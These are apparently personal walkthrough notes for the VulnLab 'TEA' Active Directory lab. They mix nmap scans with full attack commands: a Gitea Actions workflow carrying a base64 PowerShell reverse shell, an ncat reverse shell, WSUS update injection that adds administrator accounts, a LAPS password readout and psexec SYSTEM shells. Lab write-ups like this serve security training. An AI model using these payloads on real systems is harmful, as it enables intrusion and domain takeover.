Here is my notes on TEA from VulnLab.
TEA:
DC: 10.10.170.37
Nmap scan report for 10.10.170.37
Host is up, received user-set (0.12s latency).
Scanned at 2024-11-14 10:44:56 EST for 1025s
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-11-14 16:00:09Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
┌──(root㉿kali)-[/home/…/VL/TEA/results/10.10.170.38]
└─# rpcclient 10.10.170.37 -U "guest%guest" -c "enumdomusers;quit"
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/…/VL/TEA/results/10.10.170.38]
└─# rpcclient 10.10.170.37 -U "" -c "enumdomusers;quit"
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: tea.vl0., Site: Default-First-Site-Name)
ldapv3 = account required.
445/tcp open microsoft-ds? syn-ack ttl 127
smbclient -N -L 10.10.170.37
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.170.37 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
#EMPTY.
#FROM POST-EXPLOITATION of SRV:
.\WSUSpendu.ps1 -Inject -PayloadFile C:\_install\PsExec64.exe -PayloadArgs '-accepteula -s -d cmd.exe /c "net user qwop Password123@ /add && net localgroup administrators qwop /add"' -ComputerName dc.tea.vl
.\WSUSpendu.ps1 -Inject -PayloadFile C:\_install\PsExec64.exe -PayloadArgs '-accepteula -s -d cmd.exe /c "net user qwop2 Password1234@! /add && net localgroup administrators qwop2 /add"' -ComputerName dc.tea.vl
#Wait at least 5 to 10 minutes.
┌──(root㉿kali)-[/home/kali/VL]
└─# crackmapexec smb 10.10.160.85 -u 'qwop' -p 'Password123@'
SMB 10.10.160.85 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False)
SMB 10.10.160.85 445 DC [+] tea.vl\qwop:Password123@ (Pwn3d!)
WORKS !
https://dan-feliciano.com/2024/08/26/tea/
sudo rlwrap psexec.py qwop:'Password123@'@10.10.160.85
┌──(root㉿kali)-[/home/kali/VL]
└─# sudo rlwrap psexec.py qwop:'Password123@'@10.10.160.85
/usr/local/bin/psexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'psexec.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.160.85.....
[*] Found writable share ADMIN$
[*] Uploading file adHtpSgC.exe
[*] Opening SVCManager on 10.10.160.85.....
[*] Creating service PNmk on 10.10.160.85.....
[*] Starting service PNmk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2159]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
DC
SYSTEM-SHELL !
C:\Users\Administrator\Desktop>whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
DC
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is D815-5CEA
Directory of C:\Users\Administrator\Desktop
12/24/2023 05:51 AM <DIR> .
12/19/2023 08:58 AM <DIR> ..
12/24/2023 05:51 AM 36 root.txt
1 File(s) 36 bytes
2 Dir(s) 8,278,077,440 bytes free
C:\Users\Administrator\Desktop>type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.tea.vl
| Issuer: commonName=DC.tea.vl
|_ssl-date: 2024-11-14T16:01:54+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: TEA
| NetBIOS_Domain_Name: TEA
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: tea.vl
| DNS_Computer_Name: DC.tea.vl
| DNS_Tree_Name: tea.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-11-14T16:01:13+00:00
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
56514/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56517/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56525/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56547/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56793/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (85%)
OS CPE: cpe:/o:microsoft:windows_server_2016
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.013 days (since Thu Nov 14 10:42:49 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 32622/tcp): CLEAN (Timeout)
| Check 2 (port 58611/tcp): CLEAN (Timeout)
| Check 3 (port 16334/udp): CLEAN (Timeout)
| Check 4 (port 59709/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-11-14T16:01:15
|_ start_date: N/A
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 123.98 ms 10.8.0.1
2 125.24 ms 10.10.170.37
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 14 11:02:01 2024 -- 1 IP address (1 host up) scanned in 1029.08 seconds
SRV: 10.10.170.38
Nmap scan report for 10.10.170.38
Host is up, received user-set (0.13s latency).
Scanned at 2024-11-14 10:44:56 EST for 1162s
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
#EMPTY and nothing interesting.
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
┌──(root㉿kali)-[/home/…/VL/TEA/results/10.10.170.38]
└─# rpcclient 10.10.170.38 -U "" -c "enumdomusers;quit"
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/…/VL/TEA/results/10.10.170.38]
└─# rpcclient 10.10.170.38 -U "guest%guest" -c "enumdomusers;quit"
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
445/tcp open microsoft-ds? syn-ack ttl 127
┌──(root㉿kali)-[/home/…/VL/TEA/results/10.10.170.38]
└─# smbclient -N -L 10.10.170.38
session setup failed: NT_STATUS_ACCESS_DENIED
3000/tcp open ppp? syn-ack ttl 127
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
-Gitea
-Gitea version 1.21.2
-Register an account and check out explore repos as usual.
qwop:qwopqwop
Empty page of gitea, meaning no interesting repos and repos itself therefore empty.
gitea@tea.vl = Administrator - User ? -#NOPE !
NO ASREPROASTING and creds spraying = NOPE and DON'T BOTHER !
Is the users of git sites especially gitea has runner option available under the actions section of User Settings ?
It will show like this: Idle 1 SRV v0.2.6 Global windows-latest now
Gitea CI/CD Runner:
-Able to compile program without download on the computer instead it's doing within the git site for convinient sakes.
-CI/CD = Continuous Integration / Continuous Delivery.
For RCE:
1) Create a repository as a user in Gitea site as usual.
2) Check the settings of the repository and enable Actions which is Enable Repository Actions.
3) Build a yaml script out of this sample script:
https://blog.gitea.com/feature-preview-gitea-actions/
# .gitea/workflows/build.yaml #This will be our filename for the repository created.
name: Gitea Actions Demo
run-name: ${{ github.actor }} is testing out Gitea Actions 🚀
on: [push]
jobs:
Explore-Gitea-Actions:
runs-on: ubuntu-latest
steps:
- run: echo "🎉 The job was automatically triggered by a ${{ github.event_name }} event."
- run: echo "🐧 This job is now running on a ${{ runner.os }} server hosted by Gitea!"
- run: echo "🔎 The name of your branch is ${{ github.ref }} and your repository is ${{ github.repository }}."
- name: Check out repository code
uses: actions/checkout@v3
- run: echo "💡 The ${{ github.repository }} repository has been cloned to the runner."
- run: echo "🖥️ The workflow is now ready to test your code on the runner."
- name: List files in the repository
run: |
ls ${{ github.workspace }}
- run: echo "🍏 This job's status is ${{ job.status }}."
Modify in this case:
name: Gitea Actions Demo
run-name: ${{ github.actor }} is testing out Gitea Actions 🚀
on: [push]
jobs:
Explore-Gitea-Actions:
runs-on: windows-latest
steps:
- run: powershell.exe -c "whoami"
revshells.com on powershell base64 as usual:
name: Gitea Actions Demo
run-name: ${{ github.actor }} is testing out Gitea Actions 🚀
on: [push]
jobs:
Explore-Gitea-Actions:
runs-on: windows-latest
steps:
- run: powershell -e "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADAALgA3ADEAIgAsADEAMgAzADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
Save as commit changes to gain a shell:
┌──(root㉿kali)-[/home/kali/VL]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.170.38] 53887
whoami
tea\thomas.wallace
PS C:\Users\thomas.wallace\.cache\act\06b666a5bf409728\hostexecutor> whoami
tea\thomas.wallace
USER-SHELL !
https://bushidosan.com/posts/vl-tea/
PS C:\Users\thomas.wallace\Desktop> whoami
tea\thomas.wallace
PS C:\Users\thomas.wallace\Desktop> hostname
SRV
PS C:\Users\thomas.wallace\Desktop> dir
Directory: C:\Users\thomas.wallace\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/24/2023 5:39 AM 36 flag.txt
PS C:\Users\thomas.wallace\Desktop> type flag.txt
VL{REDIRECTED}
FLAG.TXT: VL{REDIRECTED}
PRIV ESC:
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/20/2023 2:48 AM Gitea
d----- 12/19/2023 10:02 AM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 12/23/2023 12:32 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 12/20/2023 2:35 AM Users
d----- 12/29/2023 2:37 AM Windows
d----- 12/19/2023 10:05 AM WSUS-Updates #Interesting ?
Use WinPEAS:
#NOPE.
ncat.exe -l -p 4444 > BloodHound.zip
nc -w 3 10.10.223.166 4444 < BloodHound.zip
#NO BloodHound Data.
PS C:\> ls -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/24/2023 5:36 AM $Recycle.Bin
d--h-- 12/19/2023 10:26 AM $WinREAgent
d--hsl 12/19/2023 5:49 PM Documents and Settings
d----- 12/20/2023 2:48 AM Gitea
d----- 12/19/2023 10:02 AM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 12/23/2023 12:32 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d--h-- 12/23/2023 12:40 PM ProgramData
d--hs- 12/19/2023 5:49 PM Recovery
d--hs- 12/19/2023 5:48 PM System Volume Information
d-r--- 12/20/2023 2:35 AM Users
d----- 12/29/2023 2:37 AM Windows
d----- 12/19/2023 10:05 AM WSUS-Updates
d--h-- 12/24/2023 5:38 AM _install #Interesting.
-a-hs- 11/14/2024 10:38 AM 12288 DumpStack.log.tmp
-a-hs- 11/14/2024 10:38 AM 1207959552 pagefile.sys
PS C:\> cd _install
PS C:\_install> dir
Directory: C:\_install
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/24/2023 5:37 AM 1118208 LAPS.x64.msi
-a---- 12/24/2023 5:37 AM 641378 LAPS_OperationsGuide.docx
-a---- 10/22/2023 6:03 AM 833472 PsExec64.exe
-a---- 12/24/2023 5:38 AM 535984 PsInfo64.exe
Powershell:
Get-LapsADPassword -Identity srv
Get-LapsADPassword -Identity srv -AsPlainText
PS C:\_install> PS C:\_install> Get-LapsADPassword -Identity srv -AsPlainText
ComputerName : SRV
DistinguishedName : CN=SRV,OU=Servers,DC=tea,DC=vl
Account : Administrator
Password : rpdNL5)4r1TH48
PasswordUpdateTime : 11/14/2024 10:48:48 AM
ExpirationTimestamp : 12/14/2024 10:48:48 AM
Source : EncryptedPassword
DecryptionStatus : Success
AuthorizedDecryptor : TEA\Server Administration
Administrator SHELL !
ls -Force
dir -Force
sudo rlwrap psexec.py administrator:'rpdNL5)4r1TH48'@10.10.144.102
┌──(root㉿kali)-[/home/kali/VL]
└─# sudo rlwrap psexec.py administrator:'rpdNL5)4r1TH48'@10.10.144.102
/usr/local/bin/psexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'psexec.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.144.102.....
[*] Found writable share ADMIN$
[*] Uploading file exrxmiuQ.exe
[*] Opening SVCManager on 10.10.144.102.....
[*] Creating service DJWu on 10.10.144.102.....
[*] Starting service DJWu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2159]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
SRV
SYSTEM-SHELL !
C:\Users\Administrator\Desktop>whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
SRV
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 9E5B-4149
Directory of C:\Users\Administrator\Desktop
12/24/2023 05:39 AM <DIR> .
12/19/2023 01:24 PM <DIR> ..
12/24/2023 05:39 AM 36 flag.txt
1 File(s) 36 bytes
2 Dir(s) 11,824,533,504 bytes free
C:\Users\Administrator\Desktop>type flag.txt
VL{REDIRECTED}
FLAG.TXT: VL{REDIRECTED}
POST-EXPLOITATION:
SharpWSUS.exe inspect
./SharpWSUS.exe inspect
SharpWSUS.exe create /payload:"C:\_install\PsExec64.exe" /args:"-accepteula -s -d C:\Users\thomas.wallace\ncat.exe -nv 10.8.0.71 5555 -e cmd" /title:"Update"
./SharpWSUS.exe create /payload:"C:\_install\PsExec64.exe" /args:"-accepteula -s -d C:\Users\thomas.wallace\ncat.exe -nv 10.8.0.71 5555 -e cmd" /title:"Update"
SharpWSUS.exe approve /updateid:<UPDATE_ID> /computername:dc.tea.vl /groupname:"User_Group"
./SharpWSUS.exe approve /updateid:<UPDATE_ID> /computername:dc.tea.vl /groupname:"User_Group"
SharpWSUS.exe approve /updateid:f532ca23-f7a1-42af-93d7-8a48f54c3fb4 /computername:dc.tea.vl /groupname:"User_Group"
SharpWSUS.exe create /payload:"C:\_install\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c " net user qwop P@assword123! /add "" /title:"Updating"
SharpWSUS.exe approve /updateid:f552bfa8-6c0a-4a81-95b0-006134eea709 /computername:dc.tea.vl /groupname:"qwop2"
.\WSUSpendu.ps1 -Inject -PayloadFile C:\_install\PsExec64.exe -PayloadArgs '-accepteula -s -d cmd.exe /c "net user qwop Password123@ /add && net localgroup administrators qwop /add"' -ComputerName dc.tea.vl
.\WSUSpendu.ps1 -Inject -PayloadFile C:\_install\PsExec64.exe -PayloadArgs '-accepteula -s -d cmd.exe /c "net user qwop2 Password1234@! /add && net localgroup administrators qwop2 /add"' -ComputerName dc.tea.vl
#Wait at least 5 to 10 minutes.
┌──(root㉿kali)-[/home/kali/VL]
└─# crackmapexec smb 10.10.160.85 -u 'qwop' -p 'Password123@'
SMB 10.10.160.85 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False)
SMB 10.10.160.85 445 DC [+] tea.vl\qwop:Password123@ (Pwn3d!)
WORKS !
https://dan-feliciano.com/2024/08/26/tea/
C:\_install\PsExec64.exe -accepteula -s -d C:\Users\thomas.wallace\ncat.exe -nv 10.8.0.71 5555 -e cmd
[SNIP]
| Set-Cookie: _csrf=YkBLpAsw-zGv8YspwU1Zn8JRPFc6MTczMTU5OTkzNTcyMDQ1MzEwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Thu, 14 Nov 2024 15:58:56 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Gitea: Git with a cup of tea</title>
[SNIP]
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=SRV.tea.vl
| Issuer: commonName=SRV.tea.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
[SNIP]
|_-----END CERTIFICATE-----
|_ssl-date: 2024-11-14T16:04:16+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: TEA
| NetBIOS_Domain_Name: TEA
| NetBIOS_Computer_Name: SRV
| DNS_Domain_Name: tea.vl
| DNS_Computer_Name: SRV.tea.vl
| DNS_Tree_Name: tea.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-11-14T16:03:36+00:00
8530/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title.
#DON'T BOTHER !
8530/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-chrono: Request times for /; avg: 376.95ms; min: 316.68ms; max: 477.98ms
| http-enum:
|_ /inventory/: Potentially interesting folder
#NOPE.
8531/tcp open unknown syn-ack ttl 127
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time:
| date: 2024-11-14T16:03:36
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 44948/tcp): CLEAN (Timeout)
| Check 2 (port 47922/tcp): CLEAN (Timeout)
| Check 3 (port 51793/udp): CLEAN (Timeout)
| Check 4 (port 34411/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 122.78 ms 10.8.0.1
2 127.66 ms 10.10.170.38
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 14 11:04:18 2024 -- 1 IP address (1 host up) scanned in 1166.22 seconds